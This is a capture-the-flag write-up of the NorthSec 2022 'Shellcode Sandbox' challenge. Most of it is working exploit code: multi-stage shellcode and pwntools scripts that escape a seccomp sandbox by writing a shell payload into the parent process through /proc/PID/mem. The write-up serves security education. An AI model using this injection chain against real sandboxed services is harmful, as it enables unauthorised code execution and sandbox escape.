[NorthSec CTF 2022] - Shellcode Sandbox

I’ve been told that there’s a service running in our infrastructure used by the API team to offload part of their computations. I have a bad feeling about it! Could you take a look at it and make sure it’s safe? There’s a rumour going around that there’s confidential information in some file named flag.txt.

Description

The description of the challenge only specifies a hostname and a port, but no binary is provided. Upon connecting to the remote host, a message clarifies the goal.

I'll read 128 bytes of your best shellcode and execute it.

Sounds promising…

My first reflex was to set up a quick execve shellcode with pwntools. The shellcraft module generates shellcode quickly and easily.

from pwn import *

def connection():
    p = remote("opsandbox.ctf", 31211)
    p.recvuntil(b"I'll read 128 bytes of your best shellcode and execute it.\n")
    return p

context.arch = "amd64"
shellcode = shellcraft.linux.sh()
p = connection()
p.sendline(asm(shellcode))
p.interactive()

Unsurprisingly, this didn’t do anything and the connection simply closed. Well, the challenge must be called Shellcode Sandbox for a reason!

Basic Shellcoding

Let’s start with a more basic shellcode and build on top of it. If you’re not familiar with shellcoding, I suggest you learn about assembly and the system call calling convention on 64-bit systems before going further.

The most basic functionality we could create is a simple call to write to retrieve information from the server.

# push some value (push has no 64-bit immediate form, so go through rax)
mov rax, 0xdeadbeefcafebabe
push rax
# call write(1, rsp, 8)
mov rdi, 1
mov rsi, rsp
mov rdx, 8
mov rax, 1
syscall

And it works! We get the desired value from the socket on our side. We can use this to get the return values of other system calls and debug our shellcode.

Now, if we can’t use execve, maybe we’re just supposed to read the flag from a file. The description does mention flag.txt. Let’s craft a simple open, read, write shellcode.

# push b'flag.txt\x00'
push 1
dec byte ptr [rsp]
mov rax, 0x7478742e67616c66
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
mov rdi, rax
# allocate space for the flag, then point rsi at it
sub rsp, 80
mov rsi, rsp
# call read
mov rdx, 80
mov rax, 0
syscall
# call write
mov rdi, 1
mov rax, 1
syscall

We send it to the server and just like that, we get the flag!

Flag: FLAG-38cad243d37e7a2df426bba4bc50c408

The Real Challenge

When the flag is submitted, we get the following message.

Good job, but can you get a shell?

Oh, so this was just the beginning. The first flag was pretty easy to get. However, it didn’t seem like we could use the execve syscall, so how could we get a shell?

I was pretty sure that the sandbox was implemented using SECCOMP, so I tried the classic bypass of adding 0x40000000 (the x32 ABI bit) to the syscall number, but no luck there.

If the sandbox really operates at the system call level, I needed to know which syscalls I could use, so I brute-forced them all. I found that Linux has around 335 syscalls on x86-64, so I called each number one by one and read back the return code.

allowed = []
for i in range(336):
    shellcode = """
        mov rax, {}
        syscall
        push rax
        # call write
        mov rdi, 1
        mov rsi, rsp
        mov rdx, 8
        mov rax, 1
        syscall
    """.format(i)

    p = connection()
    p.sendline(asm(shellcode))
    p.recvuntil(b"[+] Running shellcode\n")
    result = p.recvuntil(b"[+] Done")[:-8]
    p.close()  # avoid leaving hundreds of sockets open
    if len(result) > 0:
        print(f"{i}: {result}")
        allowed.append(i)
print(allowed)

Almost every syscall should leave the process alive even if it fails (except syscalls like exit, but those would be useless anyway). We can then read back the return code using write. However, when a syscall is forbidden by the SECCOMP filter, calling it instantly kills the process, closing the connection without any output.
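Each probe sends back the raw 8 bytes of rax, so the client still has to decode them. Here is a minimal sketch of that step, assuming the usual Linux convention that a failed syscall returns a negated errno value. The helper name `decode_retval` is made up for illustration and is not part of the original script.

```python
import errno
import struct

def decode_retval(raw: bytes) -> str:
    """Interpret 8 bytes written from rax as a signed little-endian integer."""
    (value,) = struct.unpack("<q", raw[:8])
    # Linux reports failure as -errno, in the range -4095..-1
    if -4095 <= value < 0:
        name = errno.errorcode.get(-value, "unknown errno")
        return f"error {-value} ({name})"
    return f"ok, returned {value}"

print(decode_retval(struct.pack("<q", 3)))    # e.g. a fresh file descriptor
print(decode_retval(struct.pack("<q", -2)))   # a failed call: ENOENT
```

A syscall that is allowed but fails still produces 8 bytes of output, which is what separates it from a syscall killed by the filter.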

My script seemed to work… until I saw the result. Only 4 syscalls were allowed:

read
write
open
lseek

I immediately thought there must have been a mistake, because there is no way these could be used to get a shell!

However, after submitting the first flag, the challenge description was updated with a new message.

Good work! Do you think you are able to get further?
Maybe this will be useful: https://blog.f0b.org/

It linked to the creator’s blog, which contains in-depth research about Linux process injection! Maybe there was actually a way…

Process Injection

If we could open the raw memory file of a process, maybe we could inject some shellcode into the .text section. The /proc/PID/mem file is a special kernel file that links to the virtual memory of a process. If our process has the needed rights to open it, it means we can modify the memory of a process while only using open, lseek, read and write!
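The primitive described above fits in a few lines of Python. This is only a sketch: the function name `poke` is hypothetical, and a scratch file stands in for /proc/PID/mem so that the example runs anywhere. On the target, the path would be the mem file and the offset a virtual address.

```python
import os
import tempfile

def poke(path: str, offset: int, data: bytes) -> int:
    """Overwrite len(data) bytes at `offset` using only open, lseek and write."""
    fd = os.open(path, os.O_RDWR)
    try:
        os.lseek(fd, offset, os.SEEK_SET)
        return os.write(fd, data)
    finally:
        os.close(fd)

# Demonstration on a scratch file standing in for /proc/PID/mem
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"A" * 16)
written = poke(tmp.name, 4, b"\x90\x90\x90\x90")
with open(tmp.name, "rb") as f:
    patched = f.read()
os.unlink(tmp.name)
print(written, patched)
```

The sandboxed shellcode has no close syscall available, but it does not need one: the process exits soon after the write.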

Usually, to use such a file we need the PID of the target process because it’s part of the path. However, the /proc/self directory is a symlink to the proc folder of the current process and doesn’t need a PID! Let’s make a quick test before going further.

# push /proc/self/mem
mov rax, 0x6d656d2f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDWR', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
push 2 # O_RDWR
pop rsi
cdq # rdx=0
syscall
# save the return code
push rax
# call write
mov rdi, 1
mov rsi, rsp
mov rdx, 8
mov rax, 1
syscall

Fortunately, it worked! This shellcode writes back the return value of open, which is the new file descriptor number. The file was opened in read-write mode, which means we can probably inject data into memory.
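The two constants pushed in the shellcode above are just the path cut into 8-byte little-endian chunks. The sketch below reproduces them with the standard library only. `path_to_qwords` is an illustrative name, not a pwntools function.

```python
import struct

def path_to_qwords(path: bytes) -> list:
    """Split a NUL-padded path into little-endian 64-bit values, in push order."""
    # Note: a path whose length is a multiple of 8 gets no padding here,
    # so a separate zero qword would have to be pushed first.
    padded = path + b"\x00" * (-len(path) % 8)
    chunks = [padded[i:i + 8] for i in range(0, len(padded), 8)]
    # The stack grows down, so the last chunk is pushed first
    return [struct.unpack("<Q", c)[0] for c in reversed(chunks)]

for value in path_to_qwords(b"/proc/self/mem"):
    print(hex(value))
```

This prints 0x6d656d2f666c followed by 0x65732f636f72702f, matching the two mov instructions.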

The /proc/self/mem file is a representation of virtual memory, so we need virtual addresses to make use of it. Since we have no binary, we can’t get them from there, and at this point we can’t even know if the program has ASLR or PIE enabled. We can get around that by using the /proc/self/maps file. Similarly, this is a special file which contains information about the running process, in this case the memory map.

I knew I would have to read a couple of files, so I made a function to do just that.

def push_filename(filename):
    result = ""
    # Adding a null byte if the length is a multiple of 8
    if len(filename) % 8 == 0:
        result += "push 1\n"
        result += "dec byte ptr [rsp]\n"

    for i in range(len(filename) - (len(filename)%8), -1, -8):
        if i + 8 > len(filename):
            value = u64(filename[i:len(filename)].ljust(8, b"\x00"))
        else:
            value = u64(filename[i:i+8])
        if i != len(filename):
            result += f"mov rax, {hex(value)}\n"
            result += "push rax\n"
    return result

def read_file(filename, size=80):
    shellcode = """
    # push filename
    {0}
    # call open('rsp', 'O_RDONLY', 0)
    push SYS_open # 2
    pop rax
    mov rdi, rsp
    xor esi, esi # O_RDONLY
    cdq # rdx=0
    syscall
    # save the file descriptor
    mov rdi, rax
    # allocate space for the file contents, then point rsi at it
    sub rsp, {1}
    mov rsi, rsp
    # call read
    mov rdx, {1}
    mov rax, 0
    syscall
    # call write
    mov rdi, 1
    mov rax, 1
    syscall
    """.format(push_filename(filename.encode()), size)

    p = connection()
    p.sendline(asm(shellcode))
    p.recvuntil(b"Running shellcode\n")
    return p.recvuntil(b"[+] Done")[:-8]

Memory Maps

With this script, I can now dump the contents of /proc/self/maps and inspect the memory map of our process.

55c4df67f000-55c4df680000 r--p 00000000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
55c4df680000-55c4df681000 r-xp 00001000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
55c4df681000-55c4df682000 r--p 00002000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
55c4df682000-55c4df683000 r--p 00002000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
55c4df683000-55c4df684000 rw-p 00003000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
7f016473d000-7f0164762000 r--p 00000000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f0164762000-7f01648da000 r-xp 00025000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f01648da000-7f0164924000 r--p 0019d000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f0164924000-7f0164925000 ---p 001e7000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f0164925000-7f0164928000 r--p 001e7000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f0164928000-7f016492b000 rw-p 001ea000 00:8f1 4199                      /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f016492b000-7f0164931000 rw-p 00000000 00:00 0 
7f0164934000-7f0164935000 r--p 00000000 00:8f1 4158                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f0164935000-7f0164958000 r-xp 00001000 00:8f1 4158                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f0164958000-7f0164960000 r--p 00024000 00:8f1 4158                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f0164960000-7f0164961000 r-xp 00000000 00:00 0 
7f0164961000-7f0164962000 r--p 0002c000 00:8f1 4158                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f0164962000-7f0164963000 rw-p 0002d000 00:8f1 4158                      /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f0164963000-7f0164964000 rw-p 00000000 00:00 0 
7ffffcedb000-7ffffcefc000 rw-p 00000000 00:00 0                          [stack]
7ffffcfe2000-7ffffcfe6000 r--p 00000000 00:00 0                          [vvar]
7ffffcfe6000-7ffffcfe8000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]

After running it a few times, it became clear that the most common exploit mitigations were in place: NX, ASLR and PIE. Therefore, we need to retrieve the memory map every time we make a new connection, since a new process is spawned with freshly randomized addresses.
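Since the map has to be parsed again on every connection, it helps to turn it into structured records. The following is a rough sketch that uses three lines from the dump above as sample input. `Region` and `parse_maps` are names chosen for illustration.

```python
from typing import List, NamedTuple

class Region(NamedTuple):
    start: int
    end: int
    perms: str
    path: str

def parse_maps(text: str) -> List[Region]:
    """Parse the text of /proc/PID/maps into a list of regions."""
    regions = []
    for line in text.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue  # skip truncated lines at the end of a partial read
        start, end = (int(x, 16) for x in fields[0].split("-"))
        path = fields[5].strip() if len(fields) > 5 else ""
        regions.append(Region(start, end, fields[1], path))
    return regions

sample = """\
55c4df67f000-55c4df680000 r--p 00000000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
55c4df680000-55c4df681000 r-xp 00001000 00:8f1 25814                     /home/chal1/chal-bc635201c85bb3da77006183ce971cab
7f0164960000-7f0164961000 r-xp 00000000 00:00 0
"""
regions = parse_maps(sample)
anonymous_exec = [r for r in regions if "x" in r.perms and not r.path]
print(hex(regions[0].start), [hex(r.start) for r in anonymous_exec])
```

Filtering on permissions and an empty path picks out the unnamed executable mapping, which becomes relevant later in the writeup.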

Second Flag

Now that we can read our own memory, I decided to dump the .text section to reverse engineer the binary. I needed to retrieve the contents of /proc/self/maps, parse the address of the section and write a full page of it back to the open socket.

# push /proc/self/maps
mov rax, 0x7370616d2f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
mov rdi, rax
# call read
mov rsi, rsp
mov rdx, 200
mov rax, 0
syscall
# call write
mov rdi, 1
mov rax, 1
syscall
# read PIE base address
mov rdi, 0
mov rsi, rsp
mov rdx, 8
mov rax, 0
syscall
# call write
mov rdi, 1
pop rsi
mov rdx, 4096
mov rax, 1
syscall

I chose to do all the parsing in the Python script for simplicity and efficiency. Let’s keep in mind that we only have 128 bytes of shellcode to play with.

p = connection()
p.send(assembled + b"\x90" * (128-len(assembled)))
p.recvuntil(b"Running shellcode\n")

# Get PIE base address
p.recvuntil(b"r--p")
p.recvline()
pie_base = int(p.recvuntil(b"r-xp").split(b" ")[0].split(b"-")[1].decode(), 16)
print(f"PIE base @ {hex(pie_base)}")

# Send it back
p.recvuntil(b"/hom")
p.send(p64(pie_base))

# Write .text section to file
with open("binary", "wb") as outfile:
    outfile.write(p.recvuntil(b"[+] Done in 0 seconds")[:-21])

Hidden in the code of the executable was a second flag!

FLAG-48b6d45d682a93061eee7e4094c9aa9d

Unfortunately, this flag didn’t give any points… I guess it was just a hint that we’re in the right direction. The code section didn’t really help more than that.
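One quick way to spot such a string in a dumped page is a regular-expression scan. This sketch assumes flags follow the `FLAG-` plus 32 hex digits format seen in this writeup. The sample bytes are synthetic and contain a placeholder, not a real flag.

```python
import re

FLAG_RE = re.compile(rb"FLAG-[0-9a-f]{32}")

def find_flags(blob: bytes) -> list:
    """Return every FLAG-<32 hex digits> token found in a binary blob."""
    return [m.decode() for m in FLAG_RE.findall(blob)]

# Synthetic page with a placeholder token, not a real flag
page = b"\x7fELF\x00\x00" + b"FLAG-" + b"0" * 32 + b"\x00rest"
print(find_flags(page))
```

To run it against the real dump, read the `binary` file written by the script above and pass its contents to `find_flags`.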

Finding Our Parent

Reading the code of the binary was fun but to gain code execution we will need to write data into an executable section. But wait, we already have code execution: 128 bytes of code execution to be precise! To get around the sandbox we will have to inject into another process…

Our parent process is probably a good target. We know there is a process listening for connections. It probably forks after returning from accept and it would be logical that only the child process applies the SECCOMP filter to itself before executing the shellcode.

We know we can inject some data by writing to /proc/PID/mem, so we need our parent’s PID. The proc filesystem can help us find the PID in /proc/self/stat, so we use almost the same shellcode to retrieve it, parse the values and send back the appropriate /proc/PID/mem filename.
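Parsing /proc/self/stat can be done a little more defensively than by matching on the process state. The sketch below relies on the layout documented in proc(5): pid, comm in parentheses, state, then ppid. The sample line is made up, and `parse_ppid` is an illustrative name.

```python
def parse_ppid(stat: str) -> int:
    """Extract the parent PID (4th field) from the text of /proc/PID/stat."""
    # comm (2nd field) is wrapped in parentheses and may itself contain
    # spaces or ')', so split after the last closing parenthesis
    after_comm = stat[stat.rindex(")") + 1:].split()
    # after_comm[0] is the state, after_comm[1] is the parent PID
    return int(after_comm[1])

# Made-up sample line; only the first few fields matter here
print(parse_ppid("4242 (chal 1) R 1337 4242 4242 0 -1"))
```

Splitting after the last `)` keeps the parser correct whatever the process state is and whatever characters the process name contains.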

Now we can chain both steps to create a shellcode which will open the virtual memory of our parent process!

# push /proc/self/stat
mov rax, 0x746174732f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# call read
push rsp
pop rsi
push 2048
pop rdx
xor rax, rax
syscall
# call write
push 1
pop rdi
push 1
pop rax
syscall
# read filename
xor rdi, rdi
push rsp
pop rsi
push 24
pop rdx
xor rax, rax
syscall
# call open('rsp', 'O_RDWR', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
push 2 # O_RDWR
pop rsi
cdq # rdx=0
syscall
# write return code
push rax
push 1
pop rdi
mov rsi, rsp
push 8
pop rdx
push 1
pop rax
syscall

The proc manpage specifies that the parent PID is in the fourth position, so we can easily parse it in Python.

p = connection()
p.send(assembled + b"\x90" * (128-len(assembled)))
p.recvuntil(b"Running shellcode\n")

# Parse /proc/self/stat
p.recvuntil(b") R ")
ppid = int(p.recvuntil(b" "))
print(f"parent PID is {hex(ppid)}")

# Send back the filename
p.send(flat([f"/proc/{ppid}/mem"], length=24, filler=b"\x00"))
p.interactive()

Once again we get the new file descriptor. It’s good to know we have sufficient permissions!

Now, where in our parent’s memory do we want to write? We don’t really know where its instruction pointer will be, but it will certainly pass through the .text region. It would be wise to overwrite the whole section with a huge NOP sled to make sure our shellcode gets executed. Therefore, all we need to do is read the memory map from /proc/PID/maps, use lseek to go to the right offset and write the payload.
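To see why a sled helps, here is a small model of the idea. It is not the real payload: the shellcode is a placeholder, and `with_sled` and `landing_offset` are hypothetical helpers. The model assumes execution resumes somewhere inside the overwritten region.

```python
NOP = b"\x90"

def with_sled(shellcode: bytes, size: int) -> bytes:
    """Left-pad shellcode with NOPs so the result is exactly `size` bytes."""
    if len(shellcode) > size:
        raise ValueError("shellcode does not fit")
    return NOP * (size - len(shellcode)) + shellcode

def landing_offset(payload: bytes, entry: int) -> int:
    """Model execution entering at `entry`: slide over NOPs, return where it stops."""
    while entry < len(payload) and payload[entry:entry + 1] == NOP:
        entry += 1
    return entry

fake_shellcode = b"\xcc" * 8          # placeholder bytes, not real shellcode
payload = with_sled(fake_shellcode, 1024)
print({landing_offset(payload, e) for e in range(0, 1016, 8)})
```

Every entry point inside the sled ends up at the same offset, the first byte of the shellcode, so the exact value of the parent's instruction pointer does not matter.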

Where It Gets Complicated

As if it wasn’t complicated enough, we only have 128 bytes to accomplish all these tasks. I started modifying bits of the shellcode to reduce its size. Certain operations can be done in multiple ways and some take fewer bytes than others. I replaced every mov of an immediate value with a push/pop pair, or with xor in the special case of 0.

# Before
mov rdi, 1
mov rsi, rsp
mov rdx, 8
mov rax, 0
syscall
# After
push 1
pop rdi
push rsp
pop rsi
push 8
pop rdx
xor rax, rax
syscall

I also tried to reuse register values between syscalls, for instance the size in rdx for the read and write calls.
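The gain is easy to quantify by comparing the machine code of both versions. The encodings below were assembled by hand and assume an assembler that performs no size optimisation. With pwntools available, `asm()` on each line should give the same bytes.

```python
# Hand-assembled x86-64 encodings (assumption: no assembler size optimisation)
BEFORE = {
    "mov rdi, 1":   bytes.fromhex("48c7c701000000"),
    "mov rsi, rsp": bytes.fromhex("4889e6"),
    "mov rdx, 8":   bytes.fromhex("48c7c208000000"),
    "mov rax, 0":   bytes.fromhex("48c7c000000000"),
    "syscall":      bytes.fromhex("0f05"),
}
AFTER = {
    "push 1; pop rdi":   bytes.fromhex("6a015f"),
    "push rsp; pop rsi": bytes.fromhex("545e"),
    "push 8; pop rdx":   bytes.fromhex("6a085a"),
    "xor rax, rax":      bytes.fromhex("4831c0"),
    "syscall":           bytes.fromhex("0f05"),
}

def total(block):
    """Sum the encoded length of every instruction in the block."""
    return sum(len(code) for code in block.values())

print(total(BEFORE), total(AFTER))
```

The same syscall setup shrinks from 26 to 13 bytes, mostly because a mov with a 32-bit immediate costs 7 bytes where push/pop with an 8-bit immediate costs 3.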

Unfortunately, the shellcode was still too long. I immediately thought of creating a second stage of shellcode. The only reason we didn’t write shellcode inside our own process is that the SECCOMP filter is active there, but nothing prevents us from extending our shellcode!

Finding Ourself

I didn’t see any trace of our shellcode when I dumped the .text section of our program earlier. This must mean that the shellcode is written to a different executable region. There are multiple unnamed executable regions in the memory map, so the best way to find ourselves is to leak the instruction pointer directly.

lea rax, [rip]
push rax
push 1
pop rdi
mov rsi, rsp
push 8
pop rdx
push 1
pop rax
syscall

This tiny shellcode leaks the value of the RIP register, which shows that our code runs at the beginning of one of those regions.

Since we know our shellcode is exactly 128 bytes long, we can pad the extra space with NOP operations and write an extension directly after.

# push /proc/self/maps
mov rax, 0x7370616d2f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# call read
push rsp
pop rsi
push 2048
pop rdx
xor rax, rax
syscall
# call write
push 1
pop rdi
push 1
pop rax
syscall
# read region base address, filename and stage2
xor rdi, rdi
push rsp
pop rsi
push 1048
pop rdx
xor rax, rax
syscall
# call open('rsp', 'O_RDWR', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
push 2 # O_RDWR
pop rsi
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# load region base
add rsp, 16
pop rsi
# call lseek
xor rdx, rdx
push 8
pop rax
syscall
# call write with the shellcode
push rsp
pop rsi
push 1024
pop rdx
push 1
pop rax
syscall

At this point it’s very important to send all the necessary data to the process in one shot to reduce the number of calls.

We modify our Python script to send a second stage which only writes a recognizable value to the socket.

p = connection()
p.send(assembled + b"\x90" * (128-len(assembled)))
p.recvuntil(b"Running shellcode\n")

# Get executable region base address
p.recvuntil(b"r-xp")
p.recvuntil(b"r-xp")
p.recvuntil(b"r-xp")
region_base = int(p.recvuntil(b"r-xp").split(b"\n")[-1].split(b" ")[0].split(b"-")[0].decode(), 16)
print(f"[*] executable region base @ {hex(region_base)}")

stage2 = """
# success indicator
mov rax, 0x6262626262626262
push rax
# call write
mov rdi, 1
mov rsi, rsp
mov rdx, 8
mov rax, 1
syscall
"""
assembled2 = asm(stage2)

# Send filename, region base and stage2
p.send(flat(["/proc/self/mem"], length=16, filler=b"\x00") + p64(region_base+128) + assembled2 + b"\x90"*(1024-len(assembled2)))
p.interactive()

And it works! With this technique, we have a virtually infinite number of operations for our shellcode!
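The 1048-byte blob consumed by the first stage has a fixed layout: a 16-byte filename, an 8-byte address, then 1024 bytes of code. The sketch below packs it without pwntools. `build_stage_input` is an illustrative helper, and the address and code bytes are placeholders.

```python
import struct

def build_stage_input(path: bytes, address: int, code: bytes,
                      path_len: int = 16, code_len: int = 1024) -> bytes:
    """Pack [path | address | code] the way the first stage takes it off the stack."""
    if len(path) >= path_len or len(code) > code_len:
        raise ValueError("field too long")
    blob = path.ljust(path_len, b"\x00")        # NUL-terminated filename for open
    blob += struct.pack("<Q", address)          # popped into rsi for lseek
    blob += code.ljust(code_len, b"\x90")       # NOP-padded next stage for write
    return blob

blob = build_stage_input(b"/proc/self/mem", 0x7F0164960000 + 128, b"\xcc")
print(len(blob))
```

The field sizes match the `add rsp, 16` and `pop rsi` in the shellcode: after those two instructions, rsp points at the start of the code that gets written.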

The Final Exploit

Wrapping it all together, we now have 3 stages to our exploit. The first one retrieves /proc/self/maps to find the randomized address of the executable region where the shellcode is stored. It reads back that address in binary form with an additional offset of 128 as well as the second stage of the payload. Then, it opens /proc/self/mem, uses lseek to go to the desired address and writes the second stage there.

# push /proc/self/maps
mov rax, 0x7370616d2f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# call read
push rsp
pop rsi
push 2048
pop rdx
xor rax, rax
syscall
# call write
push 1
pop rdi
push 1
pop rax
syscall
# read region base address, filename and stage2
xor rdi, rdi
push rsp
pop rsi
push 1048
pop rdx
xor rax, rax
syscall
# call open('rsp', 'O_RDWR', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
push 2 # O_RDWR
pop rsi
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# load region base
add rsp, 16
pop rsi
# call lseek
xor rdx, rdx
push 8
pop rax
syscall
# call write with the shellcode
push rsp
pop rsi
push 1024
pop rdx
push 1
pop rax
syscall
# write return code
push rax
push 1
pop rdi
mov rsi, rsp
push 8
pop rdx
push 1
pop rax
syscall

Once the first stage has finished executing, a small NOP sled leads into the second stage, which does the actual work. It retrieves the contents of /proc/self/stat, then reads back the correct path to the /proc/PID/maps of the parent process and leaks it as well. Finally, it reads the target address, the target /proc/PID/mem filename and the stage 3 payload and uses them to inject code into the parent process.

# push /proc/self/stat
mov rax, 0x746174732f666c
push rax
mov rax, 0x65732f636f72702f
push rax
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
mov rdi, rax
# call read
mov rsi, rsp
mov rdx, 40
mov rax, 0
syscall
# call write
mov rdi, 1
mov rax, 1
syscall
# read parent maps filename
mov rdi, 0
mov rsi, rsp
mov rdx, 24
mov rax, 0
syscall
# call open('rsp', 'O_RDONLY', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
xor esi, esi # O_RDONLY
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# call read
push rsp
pop rsi
push 2048
pop rdx
xor rax, rax
syscall
# call write
push 1
pop rdi
push 1
pop rax
syscall
# read parent mem filename, address and payload
mov rdi, 0
mov rsi, rsp
mov rdx, 1048
mov rax, 0
syscall
# call open('rsp', 'O_RDWR', 0)
push SYS_open # 2
pop rax
mov rdi, rsp
push 2 # O_RDWR
pop rsi
cdq # rdx=0
syscall
# save the file descriptor
push rax
pop rdi
# load PIE base
add rsp, 16
pop rsi
# call lseek
xor rdx, rdx
push 8
pop rax
syscall
# call write with the shellcode
push rsp
pop rsi
push 1024
pop rdx
push 1
pop rax
syscall
# write return code
push rax
push 1
pop rdi
mov rsi, rsp
push 8
pop rdx
push 1
pop rax
syscall

The third stage is a big NOP sled followed by a shellcode that spawns a shell generated by pwntools. Here is the final exploit script.

p = connection()
p.send(assembled + b"\x90" * (128-len(assembled)))
p.recvuntil(b"Running shellcode\n")

# Get executable region base address
p.recvuntil(b"r-xp")
p.recvuntil(b"r-xp")
p.recvuntil(b"r-xp")
region_base = int(p.recvuntil(b"r-xp").split(b"\n")[-1].split(b" ")[0].split(b"-")[0].decode(), 16)
print(f"[*] executable region base @ {hex(region_base)}")

# Send filename, region base and stage2
p.send(flat(["/proc/self/mem"], length=16, filler=b"\x00") + p64(region_base+128) + assembled2 + b"\x90"*(1024-len(assembled2)))
p.recvuntil(b"a"*8)

p.recvuntil(b") R ")
ppid = int(p.recvuntil(b" "))
print(f"[*] parent PID is {ppid}")

# Send parent PID filename
p.send(flat([f"/proc/{ppid}/maps"], length=24, filler=b"\x00"))

# Leak parent PIE base
parent_pie = int(p.recvuntil(b"r-xp").split(b"\n")[-1].split(b" ")[0].split(b"-")[0].decode(), 16)
print(f"[*] parent PIE base @ {hex(parent_pie)}")

stage3 = """
# success indicator
mov rax, 0x6262626262626262
push rax
# call write
mov rdi, 1
mov rsi, rsp
mov rdx, 8
mov rax, 1
syscall
"""
stage3 += shellcraft.linux.sh()
assembled3 = asm(stage3)

# Send parent mem filename, address and stage3
p.send(flat([f"/proc/{ppid}/mem"], length=16, filler=b"\x00") + p64(parent_pie) + b"\x90"*(1024-len(assembled3)) + assembled3)

p.interactive()

After this long journey, we are finally granted a shell and we can find the flag in a file with a randomized name.

Flag: FLAG-6d12f0f23b3832cf6d975d702d2f8cb7

Conclusion

This was a very interesting and creative challenge. I love this kind of minimalistic challenge where you are so restricted that you honestly think it’s impossible. In the end, I learned a few things and had a lot of fun. A big thanks to the creator, f0b, for bringing low-level Linux challenges to the NorthSec competition!
